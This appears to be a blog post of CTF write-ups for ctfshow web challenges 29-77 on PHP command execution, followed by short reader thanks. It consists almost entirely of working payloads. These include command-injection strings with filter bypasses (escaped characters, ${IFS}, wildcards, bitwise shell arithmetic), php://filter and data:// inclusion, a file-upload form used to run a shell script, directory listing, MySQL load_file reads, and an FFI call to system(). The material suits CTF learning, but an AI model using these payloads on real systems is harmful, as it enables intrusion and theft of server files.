[Original] ctfshow - Web Basics - Command Execution (29-77)

[huayang]

web29

?c=echo `nl flag.php`

web30

?c=echo `nl fl\ag.p\hp`

web31

?c=highlight_file($_GET[1])?>&1=flag.php

web32

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web33

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web34

Same as above

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web35

Same as above

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web36

Same as above

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web37

/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web38

Same as above

/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web39


?c=data:text/plain,<?php system('cat fla?.php')?>

web40

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

web41

https://blog.csdn.net/miuzzx/article/details/108569080

web42

?c=cat flag.php;

The trailing ; is required.

web43

web44

?c=nl fla\g.php||

web45

?c=nl<fl\ag.php||

web46

?c=nl<fl\ag.php||

web47

?c=nl<fl\ag.php||

web48

?c=nl<fl\ag.php||

web49

?c=nl<fl\ag.php||

web50

?c=nl<fl\ag.php||

web51

?c=nl<fl\ag.php||

web52

?c=nl${IFS}/fla\g||

web53

?c=nl${IFS}fla\g.php&

web54

?c=grep${IFS}'fla'${IFS}fla?.php

web55

First, write an HTML form that sends a POST file upload:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST upload PoC</title>
</head>
<body>
<form action="http://09bc84d8-cb8a-43a0-8ca0-8b0df54b56e9.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!-- The URL is that of the currently open challenge instance -->
    <label for="file">File name:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

Upload a file and intercept the request.

payload:
?c=.+/???/????????[@-[]
#!/bin/sh
ls
#!/bin/sh
cat flag.php

Method 2

payload:?c=/???/????64%20/????.???

Firefox cannot be used for this.

web56

Same as above

Digits are filtered, so method 2 cannot be used.

web57

payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))))))

web58-web65

post:
c=show_source('flag.php');

web66-web70

post:
c=print_r(scandir("/"));
post:
c=highlight_file('flag.txt');

Using show_source() here raises an error.

web71

c=$a=new DirectoryIterator("glob:///*"); foreach($a as $f){ echo $f."    " ; } exit();
post:
c=include('/flag.txt');exit(0);

web72

web73-74

Payload to list files:
c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' '); }exit(0); ?>
c=include('/flagc.txt');exit(0);

web75-76

c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

web77

c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();

Then request 1.txt.

[/huayang]

==>Please credit the source when reposting<==

Comments

  1. 豆奶特浓
    Windows Firefox
    4 months ago
    2021-10-07 20:22:58

    Awesome!

  2. hhh
    Windows Firefox
    5 months ago
    2021-9-10 23:17:02

    Learning

  3. haha
    Windows Edge
    5 months ago
    2021-9-08 14:59:50

    Here to learn

  4. y
    Windows Edge
    5 months ago
    2021-8-31 20:01:04

    Thanks for the writeup
